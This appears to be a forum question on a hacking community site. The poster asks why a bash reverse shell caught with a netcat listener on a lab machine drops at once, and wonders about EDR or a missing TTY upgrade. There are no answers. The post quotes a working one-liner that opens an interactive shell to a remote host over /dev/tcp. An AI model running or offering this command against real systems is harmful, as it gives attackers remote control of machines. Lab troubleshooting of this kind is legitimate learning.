Why is my reverse shell catching but immediately dropping?

asked by admin·5/14/2026·2 views
5

Using nc -lvnp 4444 to catch a bash reverse shell from a lab box. Connection lands but dies in under a second.

Is it likely an EDR killing the process, or am I missing a TTY upgrade?

bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

0 Answers

Your answer

Sign in to post an answer.
// install app

Install hacking.community for fast access, offline reading, and push notifications. No app store needed.